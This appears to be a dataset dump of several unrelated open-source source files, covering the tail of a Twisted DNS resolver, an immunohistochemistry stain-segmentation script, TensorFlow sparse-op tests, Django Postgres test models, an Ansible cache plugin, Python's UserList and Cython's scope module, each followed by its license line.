return self._lookup(name, dns.IN, dns.MINFO, timeout)
def lookupText(self, name, timeout = None):
return self._lookup(name, dns.IN, dns.TXT, timeout)
def lookupResponsibility(self, name, timeout = None):
return self._lookup(name, dns.IN, dns.RP, timeout)
def lookupAFSDatabase(self, name, timeout = None):
return self._lookup(name, dns.IN, dns.AFSDB, timeout)
def lookupZone(self, name, timeout = None):
return self._lookup(name, dns.IN, dns.AXFR, timeout)
def lookupAllRecords(self, name, timeout = None):
return self._lookup(name, dns.IN, dns.ALL_RECORDS, timeout)
def getHostByName(self, name, timeout = None, effort = 10):
# XXX - respect timeout
return self._lookup(name, dns.IN, dns.ALL_RECORDS, timeout).addCallback(
self._cbRecords, name, effort
)
def _cbRecords(self, (ans, auth, add), name, effort):
result = extractRecord(self, dns.Name(name), ans + auth + add, effort)
if not result:
raise error.DNSLookupError(name)
return result
if hasattr(socket, 'inet_ntop'):
def extractRecord(resolver, name, answers, level = 10):
if not level:
return None
for r in answers:
if r.name == name and r.type == dns.A6:
return socket.inet_ntop(socket.AF_INET6, r.payload.address)
for r in answers:
if r.name == name and r.type == dns.AAAA:
return socket.inet_ntop(socket.AF_INET6, r.payload.address)
for r in answers:
if r.name == name and r.type == dns.A:
return socket.inet_ntop(socket.AF_INET, r.payload.address)
for r in answers:
if r.name == name and r.type == dns.CNAME:
result = extractRecord(resolver, r.payload.name, answers, level - 1)
if not result:
return resolver.getHostByName(str(r.payload.name), effort=level-1)
return result
else:
def extractRecord(resolver, name, answers, level = 10):
if not level:
return None
for r in answers:
if r.name == name and r.type == dns.A:
return socket.inet_ntoa(r.payload.address)
for r in answers:
if r.name == name and r.type == dns.CNAME:
result = extractRecord(resolver, r.payload.name, answers, level - 1)
if not result:
return resolver.getHostByName(str(r.payload.name), effort=level-1)
return result
typeToMethod = {
dns.A: 'lookupAddress',
dns.AAAA: 'lookupIPV6Address',
dns.A6: 'lookupAddress6',
dns.NS: 'lookupNameservers',
dns.CNAME: 'lookupCanonicalName',
dns.SOA: 'lookupAuthority',
dns.MB: 'lookupMailBox',
dns.MG: 'lookupMailGroup',
dns.MR: 'lookupMailRename',
dns.NULL: 'lookupNull',
dns.WKS: 'lookupWellKnownServices',
dns.PTR: 'lookupPointer',
dns.HINFO: 'lookupHostInfo',
dns.MINFO: 'lookupMailboxInfo',
dns.MX: 'lookupMailExchange',
dns.TXT: 'lookupText',
dns.RP: 'lookupResponsibility',
dns.AFSDB: 'lookupAFSDatabase',
dns.SRV: 'lookupService',
dns.AXFR: 'lookupZone',
dns.ALL_RECORDS: 'lookupAllRecords',
}
| gpl-2.0 |
griffincalme/MicroDeconvolution | website/MicroDeconvolution/RandomWalkScript.py | 1 | 5032 | import numpy as np
from numpy import linalg
import matplotlib.pyplot as plt
from skimage.exposure import rescale_intensity
from skimage.segmentation import random_walker
from skimage.color import separate_stains
from skimage.color import rgb2grey
from skimage.io import imread
import time
from pyamg import *
#Color deconvolution
#Hematoxylin(0), Red(1), DAB(2)
rgb_from_hrd = np.array([[0.65, 0.70, 0.29],
[0.1, 0.95, 0.95],
[0.27, 0.57, 0.78]])
hrd_from_rgb = linalg.inv(rgb_from_hrd)
def stainspace_to_2d_array(ihc_xyz, channel):
rescale = rescale_intensity(ihc_xyz[:, :, channel], out_range=(0,1))
stain_array = np.dstack((np.zeros_like(rescale), rescale, rescale))
grey_array = rgb2grey(stain_array)
return grey_array
#Get markers for random walk
def get_markers(grey_array, bottom_thresh, top_thresh):
markers = np.zeros_like(grey_array)
markers[grey_array < bottom_thresh] = 1
markers[grey_array > top_thresh] = 2
return markers
def random_walk_segmentation(input_image, output_folder):
input_image = imread(input_image)
ihc_hrd = separate_stains(input_image, hrd_from_rgb)
DAB_Grey_Array = stainspace_to_2d_array(ihc_hrd, 2)
Hema_Gray_Array = stainspace_to_2d_array(ihc_hrd, 0)
GBIred_Gray_Array = stainspace_to_2d_array(ihc_hrd, 1)
#Perform Random Walker, fills in positive regions
DAB_segmentation = random_walker(DAB_Grey_Array, get_markers(DAB_Grey_Array, .3, .5), beta=130, mode='cg_mg')
Hema_segmentation = random_walker(Hema_Gray_Array, get_markers(Hema_Gray_Array, .2, .4), beta=130, mode='cg_mg')
GBIred_segmentation = random_walker(GBIred_Gray_Array, get_markers(GBIred_Gray_Array, .4, .5), beta=130,
mode='cg_mg')
'''Compute and Output'''
#Compute and output percentages of pixels stained by each chromagen
pic_dimensions = np.shape(DAB_segmentation) # both arrays same shape
total_pixels = pic_dimensions[0] * pic_dimensions[1]
#Change negative pixel values from 1 -> 0, positives 2 -> 1
subtrahend_array = np.ones_like(DAB_segmentation)
DAB_segmentation = np.subtract(DAB_segmentation, subtrahend_array)
Hema_segmentation = np.subtract(Hema_segmentation, subtrahend_array)
GBIred_segmentation = np.subtract(GBIred_segmentation, subtrahend_array)
#Count positive pixels
DAB_pixels = np.count_nonzero(DAB_segmentation)
Hema_pixels = np.count_nonzero(Hema_segmentation)
red_pixels = np.count_nonzero(GBIred_segmentation)
#Percent of image covered by positive staining
DAB_coverage_percent = (round((DAB_pixels / total_pixels * 100), 1))
Hema_coverage_percent = (round((Hema_pixels / total_pixels * 100), 1))
#An overlay of the DAB and Hematoxylin segmented images, for total cellular area
total_cell_array = np.add(DAB_segmentation, Hema_segmentation)
#Number of pixels covered by cellular area
total_cell_pixels = np.count_nonzero(total_cell_array)
#Percent of image covered by cellular area (DAB OR Hematoxylin)
total_cell_percent = (round((total_cell_pixels / total_pixels * 100), 1))
#The percentage of DAB/CD3+ cells out of the total number of cells
percent_pos_cells = (round((DAB_pixels / total_cell_pixels * 100), 1))
#The percentage of the image covered by cytokines
Red_coverage_percent = (round((red_pixels / total_pixels * 100), 1))
red_plus_total_array = np.add(total_cell_array, GBIred_segmentation)
red_plus_total_pixels = np.count_nonzero(red_plus_total_array)
#The percentage of the area covered by cytokines, with non-cellular regions subtracted
adjusted_red_coverage_percent = (round((red_pixels / red_plus_total_pixels * 100), 1))
# Plot images
fig, axes = plt.subplots(2, 2, figsize=(12, 11))
ax0, ax1, ax2, ax3 = axes.ravel()
ax0.imshow(input_image, cmap=plt.cm.gray, interpolation='nearest')
ax0.set_title("Original")
ax1.imshow(DAB_segmentation, cmap=plt.cm.gray, interpolation='nearest')
ax1.set_title("DAB")
ax2.imshow(GBIred_segmentation, cmap=plt.cm.gray)
ax2.set_title("GBI red")
ax3.imshow(Hema_segmentation, cmap=plt.cm.gray)
ax3.set_title("Hematoxylin")
for ax in axes.ravel():
ax.axis('off')
fig.subplots_adjust(left=None, bottom=None, right=None, top=None, wspace=None, hspace=None)
output_filename = 'output' + time.strftime("%Y-%m-%d %H:%M:%S")
plt.savefig(output_folder + output_filename)
#do a save csv here, maybe delete return statement after this comment
return output_filename#, DAB_coverage_percent, Hema_coverage_percent, total_cell_percent, percent_pos_cells, Red_coverage_percent, adjusted_red_coverage_percent
#--- Test ---
#file_path = '/home/griffin/Desktop/MicroDeconvolution/TestingScripts/SamplePics/TestImage.jpg'
#save_directory = '/home/griffin/Desktop/MicroDeconvolution/website/media/images/output/'
#random_walk_segmentation(file_path, save_directory)
| apache-2.0 |
codrut3/tensorflow | tensorflow/contrib/layers/python/ops/sparse_ops_test.py | 75 | 13684 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.contrib.layers.python.ops.sparse_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.layers.python.ops import sparse_ops
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import test
def _assert_sparse_tensor_value(test_case, expected, actual):
test_case.assertEqual(np.int64, np.array(actual.indices).dtype)
test_case.assertAllEqual(expected.indices, actual.indices)
test_case.assertEqual(
np.array(expected.values).dtype, np.array(actual.values).dtype)
test_case.assertAllEqual(expected.values, actual.values)
test_case.assertEqual(np.int64, np.array(actual.dense_shape).dtype)
test_case.assertAllEqual(expected.dense_shape, actual.dense_shape)
class DenseToSparseTensorTest(test.TestCase):
def test_dense_to_sparse_tensor_1d(self):
with self.test_session() as sess:
st = sparse_ops.dense_to_sparse_tensor([1, 0, 2, 0])
result = sess.run(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.int32)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[0], [2]], result.indices)
self.assertAllEqual([1, 2], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_tensor_1d_float(self):
with self.test_session() as sess:
st = sparse_ops.dense_to_sparse_tensor([1.5, 0.0, 2.3, 0.0])
result = sess.run(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.float32)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[0], [2]], result.indices)
self.assertAllClose([1.5, 2.3], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_tensor_1d_bool(self):
with self.test_session() as sess:
st = sparse_ops.dense_to_sparse_tensor([True, False, True, False])
result = sess.run(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.bool)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[0], [2]], result.indices)
self.assertAllEqual([True, True], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_tensor_1d_str(self):
with self.test_session() as sess:
st = sparse_ops.dense_to_sparse_tensor([b'qwe', b'', b'ewq', b''])
result = sess.run(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.object)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[0], [2]], result.indices)
self.assertAllEqual([b'qwe', b'ewq'], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_tensor_1d_str_special_ignore(self):
with self.test_session() as sess:
st = sparse_ops.dense_to_sparse_tensor(
[b'qwe', b'', b'ewq', b''], ignore_value=b'qwe')
result = sess.run(st)
self.assertEqual(result.indices.dtype, np.int64)
self.assertEqual(result.values.dtype, np.object)
self.assertEqual(result.dense_shape.dtype, np.int64)
self.assertAllEqual([[1], [2], [3]], result.indices)
self.assertAllEqual([b'', b'ewq', b''], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_tensor_2d(self):
with self.test_session() as sess:
st = sparse_ops.dense_to_sparse_tensor([[1, 2, 0, 0], [3, 4, 5, 0]])
result = sess.run(st)
self.assertAllEqual([[0, 0], [0, 1], [1, 0], [1, 1], [1, 2]],
result.indices)
self.assertAllEqual([1, 2, 3, 4, 5], result.values)
self.assertAllEqual([2, 4], result.dense_shape)
def test_dense_to_sparse_tensor_3d(self):
with self.test_session() as sess:
st = sparse_ops.dense_to_sparse_tensor([[[1, 2, 0, 0], [3, 4, 5, 0]],
[[7, 8, 0, 0], [9, 0, 0, 0]]])
result = sess.run(st)
self.assertAllEqual([[0, 0, 0], [0, 0, 1], [0, 1, 0], [0, 1, 1], [0, 1, 2],
[1, 0, 0], [1, 0, 1], [1, 1, 0]], result.indices)
self.assertAllEqual([1, 2, 3, 4, 5, 7, 8, 9], result.values)
self.assertAllEqual([2, 2, 4], result.dense_shape)
def test_dense_to_sparse_tensor_unknown_1d_shape(self):
with self.test_session() as sess:
tensor = array_ops.placeholder(shape=[None], dtype=dtypes.int32)
st = sparse_ops.dense_to_sparse_tensor(tensor)
result = sess.run(st, feed_dict={tensor: [0, 100, 0, 3]})
self.assertAllEqual([[1], [3]], result.indices)
self.assertAllEqual([100, 3], result.values)
self.assertAllEqual([4], result.dense_shape)
def test_dense_to_sparse_tensor_unknown_3d_shape(self):
with self.test_session() as sess:
tensor = array_ops.placeholder(
shape=[None, None, None], dtype=dtypes.int32)
st = sparse_ops.dense_to_sparse_tensor(tensor)
result = sess.run(st,
feed_dict={
tensor: [[[1, 2, 0, 0], [3, 4, 5, 0]],
[[7, 8, 0, 0], [9, 0, 0, 0]]]
})
self.assertAllEqual([[0, 0, 0], [0, 0, 1], [0, 1, 0], [0, 1, 1], [0, 1, 2],
[1, 0, 0], [1, 0, 1], [1, 1, 0]], result.indices)
self.assertAllEqual([1, 2, 3, 4, 5, 7, 8, 9], result.values)
self.assertAllEqual([2, 2, 4], result.dense_shape)
def test_dense_to_sparse_unknown_rank(self):
ph = array_ops.placeholder(dtype=dtypes.int32)
with self.test_session() as sess:
st = sparse_ops.dense_to_sparse_tensor(ph)
result = sess.run(st, feed_dict={ph: [[1, 2, 0, 0], [3, 4, 5, 0]]})
self.assertAllEqual([[0, 0], [0, 1], [1, 0], [1, 1], [1, 2]],
result.indices)
self.assertAllEqual([1, 2, 3, 4, 5], result.values)
self.assertAllEqual([2, 4], result.dense_shape)
class SparseRowEnvelopeTest(test.TestCase):
def test_sparse_row_envelope(self):
expected_sparse_row_envelope = [1, 0, 3]
with self.test_session() as sess:
sparse_input = sparse_tensor.SparseTensor(
indices=[[0, 0], [2, 0], [2, 1], [2, 2]],
values=[0, 1, 2, 3],
dense_shape=[3, 3])
sparse_row_envelope = sess.run(
sparse_ops.sparse_row_envelope(sparse_input))
self.assertAllEqual(expected_sparse_row_envelope,
sparse_row_envelope)
def test_sparse_row_envelope_unsorted_indices(self):
expected_sparse_row_envelope = [1, 0, 3]
with self.test_session() as sess:
sparse_input = sparse_tensor.SparseTensor(
indices=[[2, 0], [2, 2], [2, 1], [0, 0]],
values=[0, 1, 2, 3],
dense_shape=[3, 3])
sparse_row_envelope = sess.run(
sparse_ops.sparse_row_envelope(sparse_input))
self.assertAllEqual(expected_sparse_row_envelope,
sparse_row_envelope)
def test_sparse_row_envelope_empty_in_the_end(self):
expected_sparse_row_envelope = [1, 0, 3, 0, 0]
with self.test_session() as sess:
sparse_input = sparse_tensor.SparseTensor(
indices=[[0, 0], [2, 0], [2, 1], [2, 2]],
values=[0, 1, 2, 3],
dense_shape=[5, 3])
sparse_row_envelope = sess.run(
sparse_ops.sparse_row_envelope(sparse_input))
self.assertAllEqual(expected_sparse_row_envelope,
sparse_row_envelope)
def test_sparse_row_envelope_empty_3d(self):
expected_sparse_row_envelope = [1, 0, 3, 0, 0]
with self.test_session() as sess:
sparse_input = sparse_tensor.SparseTensor(
indices=[[0, 0, 0], [0, 2, 0], [0, 2, 1], [0, 2, 2]],
values=[0, 1, 2, 3],
dense_shape=[1, 5, 3])
sparse_row_envelope = sess.run(
sparse_ops.sparse_row_envelope(sparse_input, 1, 2))
self.assertAllEqual(expected_sparse_row_envelope,
sparse_row_envelope)
class IndicatorToSparseIdsTest(test.TestCase):
def test_indicators_to_sparse_ids_1d(self):
indicators = (0, 0, 1, 0)
sparse_ids = sparse_ops.indicators_to_sparse_ids(indicators)
with self.test_session():
_assert_sparse_tensor_value(self, sparse_tensor.SparseTensorValue(
indices=((0,),),
values=(2,),
dense_shape=(1,),
), sparse_ids.eval())
def test_indicators_to_sparse_ids_2d(self):
indicators = (
(0, 0, 1, 0),
(1, 0, 0, 1),
)
sparse_ids = sparse_ops.indicators_to_sparse_ids(indicators)
with self.test_session():
_assert_sparse_tensor_value(self, sparse_tensor.SparseTensorValue(
indices=((0, 0), (1, 0), (1, 1)),
values=(2, 0, 3),
dense_shape=(2, 2),
), sparse_ids.eval())
def test_indicators_to_sparse_ids_3d(self):
indicators = (
((0, 0, 1, 0, 0), (0, 0, 0, 0, 0)),
((1, 0, 0, 1, 0), (0, 0, 1, 0, 0)),
((0, 0, 0, 0, 0), (0, 0, 0, 0, 0)),
((1, 0, 0, 1, 1), (0, 0, 1, 0, 0)),
)
sparse_ids = sparse_ops.indicators_to_sparse_ids(indicators)
with self.test_session():
_assert_sparse_tensor_value(self, sparse_tensor.SparseTensorValue(
indices=(
(0, 0, 0),
(1, 0, 0), (1, 0, 1), (1, 1, 0),
(3, 0, 0), (3, 0, 1), (3, 0, 2), (3, 1, 0)
), values=(
2,
0, 3, 2,
0, 3, 4, 2
), dense_shape=(4, 2, 3),
), sparse_ids.eval())
def test_int16_to_sparse_ids_2d(self):
indicators = (
(0, 0, 1, 0),
(1, 0, 0, 1),
)
sparse_ids = sparse_ops.indicators_to_sparse_ids(
indicators, dtype=dtypes.int16)
with self.test_session():
_assert_sparse_tensor_value(self, sparse_tensor.SparseTensorValue(
indices=((0, 0), (1, 0), (1, 1)),
values=np.array((2, 0, 3), dtype=np.int16),
dense_shape=(2, 2),
), sparse_ids.eval())
def test_indicators_to_sparse_ids_ignore_value(self):
indicators = (
((-1, -1, 10, -1), (-1, -1, -1, -1)),
((11, -1, -1, 12), (-1, -1, 13, -1)),
)
sparse_ids = sparse_ops.indicators_to_sparse_ids(
indicators, ignore_value=-1)
with self.test_session():
_assert_sparse_tensor_value(self, sparse_tensor.SparseTensorValue(
indices=((0, 0, 0), (1, 0, 0), (1, 0, 1), (1, 1, 0)),
values=(2, 0, 3, 2),
dense_shape=(2, 2, 2),
), sparse_ids.eval())
def test_string_indicators_to_sparse_ids(self):
indicators = (
(('', '', 'A', ''), ('', '', '', '')),
(('B', '', '', 'C'), ('', '', 'D', '')),
)
sparse_ids = sparse_ops.indicators_to_sparse_ids(indicators)
with self.test_session():
_assert_sparse_tensor_value(self, sparse_tensor.SparseTensorValue(
indices=((0, 0, 0), (1, 0, 0), (1, 0, 1), (1, 1, 0)),
values=(2, 0, 3, 2),
dense_shape=(2, 2, 2),
), sparse_ids.eval())
def test_string_indicators_to_sparse_ids_ignore_value(self):
indicators = (
(('x', 'x', 'A', 'x'), ('x', 'x', 'x', 'x')),
(('B', 'x', 'x', 'C'), ('x', 'x', 'D', 'x')),
)
sparse_ids = sparse_ops.indicators_to_sparse_ids(
indicators, ignore_value='x')
with self.test_session():
_assert_sparse_tensor_value(self, sparse_tensor.SparseTensorValue(
indices=((0, 0, 0), (1, 0, 0), (1, 0, 1), (1, 1, 0)),
values=(2, 0, 3, 2),
dense_shape=(2, 2, 2),
), sparse_ids.eval())
def test_indicators_to_sparse_ids_unknown_3d_shape(self):
indicators_values = (
((0, 0, 1, 0), (0, 0, 0, 0)),
((1, 0, 0, 1), (0, 0, 1, 0)),
)
indicators = array_ops.placeholder(
dtype=dtypes.int32, shape=(None, None, None))
sparse_ids = sparse_ops.indicators_to_sparse_ids(indicators)
with self.test_session():
_assert_sparse_tensor_value(self, sparse_tensor.SparseTensorValue(
indices=((0, 0, 0), (1, 0, 0), (1, 0, 1), (1, 1, 0)),
values=(2, 0, 3, 2),
dense_shape=(2, 2, 2),
), sparse_ids.eval(feed_dict={indicators: indicators_values}))
def test_indicators_to_sparse_ids_unknown_rank(self):
indicators_values = (
((0, 0, 1, 0), (0, 0, 0, 0)),
((1, 0, 0, 1), (0, 0, 1, 0)),
)
indicators = array_ops.placeholder(dtype=dtypes.int32)
sparse_ids = sparse_ops.indicators_to_sparse_ids(indicators)
with self.test_session():
_assert_sparse_tensor_value(self, sparse_tensor.SparseTensorValue(
indices=((0, 0, 0), (1, 0, 0), (1, 0, 1), (1, 1, 0)),
values=(2, 0, 3, 2),
dense_shape=(2, 2, 2),
), sparse_ids.eval(feed_dict={indicators: indicators_values}))
if __name__ == '__main__':
test.main()
| apache-2.0 |
epandurski/django | tests/postgres_tests/models.py | 50 | 3528 | from django.db import connection, models
from .fields import (
ArrayField, BigIntegerRangeField, DateRangeField, DateTimeRangeField,
FloatRangeField, HStoreField, IntegerRangeField, JSONField,
)
class PostgreSQLModel(models.Model):
class Meta:
abstract = True
required_db_vendor = 'postgresql'
class IntegerArrayModel(PostgreSQLModel):
field = ArrayField(models.IntegerField())
class NullableIntegerArrayModel(PostgreSQLModel):
field = ArrayField(models.IntegerField(), blank=True, null=True)
class CharArrayModel(PostgreSQLModel):
field = ArrayField(models.CharField(max_length=10))
class DateTimeArrayModel(PostgreSQLModel):
datetimes = ArrayField(models.DateTimeField())
dates = ArrayField(models.DateField())
times = ArrayField(models.TimeField())
class NestedIntegerArrayModel(PostgreSQLModel):
field = ArrayField(ArrayField(models.IntegerField()))
class OtherTypesArrayModel(PostgreSQLModel):
ips = ArrayField(models.GenericIPAddressField())
uuids = ArrayField(models.UUIDField())
decimals = ArrayField(models.DecimalField(max_digits=5, decimal_places=2))
class HStoreModel(PostgreSQLModel):
field = HStoreField(blank=True, null=True)
class CharFieldModel(models.Model):
field = models.CharField(max_length=16)
class TextFieldModel(models.Model):
field = models.TextField()
# Only create this model for postgres >= 9.2
if connection.vendor == 'postgresql' and connection.pg_version >= 90200:
class RangesModel(PostgreSQLModel):
ints = IntegerRangeField(blank=True, null=True)
bigints = BigIntegerRangeField(blank=True, null=True)
floats = FloatRangeField(blank=True, null=True)
timestamps = DateTimeRangeField(blank=True, null=True)
dates = DateRangeField(blank=True, null=True)
class RangeLookupsModel(PostgreSQLModel):
parent = models.ForeignKey(RangesModel, blank=True, null=True)
integer = models.IntegerField(blank=True, null=True)
big_integer = models.BigIntegerField(blank=True, null=True)
float = models.FloatField(blank=True, null=True)
timestamp = models.DateTimeField(blank=True, null=True)
date = models.DateField(blank=True, null=True)
else:
# create an object with this name so we don't have failing imports
class RangesModel(object):
pass
class RangeLookupsModel(object):
pass
# Only create this model for postgres >= 9.4
if connection.vendor == 'postgresql' and connection.pg_version >= 90400:
class JSONModel(models.Model):
field = JSONField(blank=True, null=True)
else:
# create an object with this name so we don't have failing imports
class JSONModel(object):
pass
class ArrayFieldSubclass(ArrayField):
def __init__(self, *args, **kwargs):
super(ArrayFieldSubclass, self).__init__(models.IntegerField())
class AggregateTestModel(models.Model):
"""
To test postgres-specific general aggregation functions
"""
char_field = models.CharField(max_length=30, blank=True)
integer_field = models.IntegerField(null=True)
boolean_field = models.NullBooleanField()
class StatTestModel(models.Model):
"""
To test postgres-specific aggregation functions for statistics
"""
int1 = models.IntegerField()
int2 = models.IntegerField()
related_field = models.ForeignKey(AggregateTestModel, null=True)
class NowTestModel(models.Model):
when = models.DateTimeField(null=True, default=None)
| bsd-3-clause |
KohlsTechnology/ansible | test/integration/targets/gathering_facts/cache_plugins/none.py | 159 | 1114 | # (c) 2014, Brian Coca, Josh Drake, et al
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.plugins.cache import BaseCacheModule
DOCUMENTATION = '''
cache: none
short_description: write-only cache (no cache)
description:
- No caching at all
version_added: historical
author: core team (@ansible-core)
'''
class CacheModule(BaseCacheModule):
def __init__(self, *args, **kwargs):
self.empty = {}
def get(self, key):
return self.empty.get(key)
def set(self, key, value):
return value
def keys(self):
return self.empty.keys()
def contains(self, key):
return key in self.empty
def delete(self, key):
del self.emtpy[key]
def flush(self):
self.empty = {}
def copy(self):
return self.empty.copy()
def __getstate__(self):
return self.copy()
def __setstate__(self, data):
self.empty = data
| gpl-3.0 |
google/google-ctf | third_party/edk2/AppPkg/Applications/Python/Python-2.7.2/Lib/UserList.py | 67 | 3732 | """A more or less complete user-defined wrapper around list objects."""
import collections
class UserList(collections.MutableSequence):
def __init__(self, initlist=None):
self.data = []
if initlist is not None:
# XXX should this accept an arbitrary sequence?
if type(initlist) == type(self.data):
self.data[:] = initlist
elif isinstance(initlist, UserList):
self.data[:] = initlist.data[:]
else:
self.data = list(initlist)
def __repr__(self): return repr(self.data)
def __lt__(self, other): return self.data < self.__cast(other)
def __le__(self, other): return self.data <= self.__cast(other)
def __eq__(self, other): return self.data == self.__cast(other)
def __ne__(self, other): return self.data != self.__cast(other)
def __gt__(self, other): return self.data > self.__cast(other)
def __ge__(self, other): return self.data >= self.__cast(other)
def __cast(self, other):
if isinstance(other, UserList): return other.data
else: return other
def __cmp__(self, other):
return cmp(self.data, self.__cast(other))
__hash__ = None # Mutable sequence, so not hashable
def __contains__(self, item): return item in self.data
def __len__(self): return len(self.data)
def __getitem__(self, i): return self.data[i]
def __setitem__(self, i, item): self.data[i] = item
def __delitem__(self, i): del self.data[i]
def __getslice__(self, i, j):
i = max(i, 0); j = max(j, 0)
return self.__class__(self.data[i:j])
def __setslice__(self, i, j, other):
i = max(i, 0); j = max(j, 0)
if isinstance(other, UserList):
self.data[i:j] = other.data
elif isinstance(other, type(self.data)):
self.data[i:j] = other
else:
self.data[i:j] = list(other)
def __delslice__(self, i, j):
i = max(i, 0); j = max(j, 0)
del self.data[i:j]
def __add__(self, other):
if isinstance(other, UserList):
return self.__class__(self.data + other.data)
elif isinstance(other, type(self.data)):
return self.__class__(self.data + other)
else:
return self.__class__(self.data + list(other))
def __radd__(self, other):
if isinstance(other, UserList):
return self.__class__(other.data + self.data)
elif isinstance(other, type(self.data)):
return self.__class__(other + self.data)
else:
return self.__class__(list(other) + self.data)
def __iadd__(self, other):
if isinstance(other, UserList):
self.data += other.data
elif isinstance(other, type(self.data)):
self.data += other
else:
self.data += list(other)
return self
def __mul__(self, n):
return self.__class__(self.data*n)
__rmul__ = __mul__
def __imul__(self, n):
self.data *= n
return self
def append(self, item): self.data.append(item)
def insert(self, i, item): self.data.insert(i, item)
def pop(self, i=-1): return self.data.pop(i)
def remove(self, item): self.data.remove(item)
def count(self, item): return self.data.count(item)
def index(self, item, *args): return self.data.index(item, *args)
def reverse(self): self.data.reverse()
def sort(self, *args, **kwds): self.data.sort(*args, **kwds)
def extend(self, other):
if isinstance(other, UserList):
self.data.extend(other.data)
else:
self.data.extend(other)
| apache-2.0 |
FusionSP/android_external_chromium_org | third_party/cython/src/Cython/Compiler/CythonScope.py | 99 | 5817 | from Symtab import ModuleScope
from PyrexTypes import *
from UtilityCode import CythonUtilityCode
from Errors import error
from Scanning import StringSourceDescriptor
import MemoryView
class CythonScope(ModuleScope):
is_cython_builtin = 1
_cythonscope_initialized = False
def __init__(self, context):
ModuleScope.__init__(self, u'cython', None, None)
self.pxd_file_loaded = True
self.populate_cython_scope()
# The Main.Context object
self.context = context
for fused_type in (cy_integral_type, cy_floating_type, cy_numeric_type):
entry = self.declare_typedef(fused_type.name,
fused_type,
None,
cname='<error>')
entry.in_cinclude = True
def lookup_type(self, name):
# This function should go away when types are all first-level objects.
type = parse_basic_type(name)
if type:
return type
return super(CythonScope, self).lookup_type(name)
def lookup(self, name):
entry = super(CythonScope, self).lookup(name)
if entry is None and not self._cythonscope_initialized:
self.load_cythonscope()
entry = super(CythonScope, self).lookup(name)
return entry
def find_module(self, module_name, pos):
error("cython.%s is not available" % module_name, pos)
def find_submodule(self, module_name):
entry = self.entries.get(module_name, None)
if not entry:
self.load_cythonscope()
entry = self.entries.get(module_name, None)
if entry and entry.as_module:
return entry.as_module
else:
# TODO: fix find_submodule control flow so that we're not
# expected to create a submodule here (to protect CythonScope's
# possible immutability). Hack ourselves out of the situation
# for now.
raise error((StringSourceDescriptor(u"cython", u""), 0, 0),
"cython.%s is not available" % module_name)
def lookup_qualified_name(self, qname):
# ExprNode.as_cython_attribute generates qnames and we untangle it here...
name_path = qname.split(u'.')
scope = self
while len(name_path) > 1:
scope = scope.lookup_here(name_path[0]).as_module
del name_path[0]
if scope is None:
return None
else:
return scope.lookup_here(name_path[0])
def populate_cython_scope(self):
# These are used to optimize isinstance in FinalOptimizePhase
type_object = self.declare_typedef(
'PyTypeObject',
base_type = c_void_type,
pos = None,
cname = 'PyTypeObject')
type_object.is_void = True
type_object_type = type_object.type
self.declare_cfunction(
'PyObject_TypeCheck',
CFuncType(c_bint_type, [CFuncTypeArg("o", py_object_type, None),
CFuncTypeArg("t", c_ptr_type(type_object_type), None)]),
pos = None,
defining = 1,
cname = 'PyObject_TypeCheck')
def load_cythonscope(self):
"""
Creates some entries for testing purposes and entries for
cython.array() and for cython.view.*.
"""
if self._cythonscope_initialized:
return
self._cythonscope_initialized = True
cython_testscope_utility_code.declare_in_scope(
self, cython_scope=self)
cython_test_extclass_utility_code.declare_in_scope(
self, cython_scope=self)
#
# The view sub-scope
#
self.viewscope = viewscope = ModuleScope(u'view', self, None)
self.declare_module('view', viewscope, None).as_module = viewscope
viewscope.is_cython_builtin = True
viewscope.pxd_file_loaded = True
cythonview_testscope_utility_code.declare_in_scope(
viewscope, cython_scope=self)
view_utility_scope = MemoryView.view_utility_code.declare_in_scope(
self.viewscope, cython_scope=self,
whitelist=MemoryView.view_utility_whitelist)
# self.entries["array"] = view_utility_scope.entries.pop("array")
def create_cython_scope(context):
# One could in fact probably make it a singleton,
# but not sure yet whether any code mutates it (which would kill reusing
# it across different contexts)
return CythonScope(context)
# Load test utilities for the cython scope
def load_testscope_utility(cy_util_name, **kwargs):
return CythonUtilityCode.load(cy_util_name, "TestCythonScope.pyx", **kwargs)
undecorated_methods_protos = UtilityCode(proto=u"""
/* These methods are undecorated and have therefore no prototype */
static PyObject *__pyx_TestClass_cdef_method(
struct __pyx_TestClass_obj *self, int value);
static PyObject *__pyx_TestClass_cpdef_method(
struct __pyx_TestClass_obj *self, int value, int skip_dispatch);
static PyObject *__pyx_TestClass_def_method(
PyObject *self, PyObject *value);
""")
cython_testscope_utility_code = load_testscope_utility("TestScope")
test_cython_utility_dep = load_testscope_utility("TestDep")
cython_test_extclass_utility_code = \
load_testscope_utility("TestClass", name="TestClass",
requires=[undecorated_methods_protos,
test_cython_utility_dep])
cythonview_testscope_utility_code = load_testscope_utility("View.TestScope")
| bsd-3-clause |
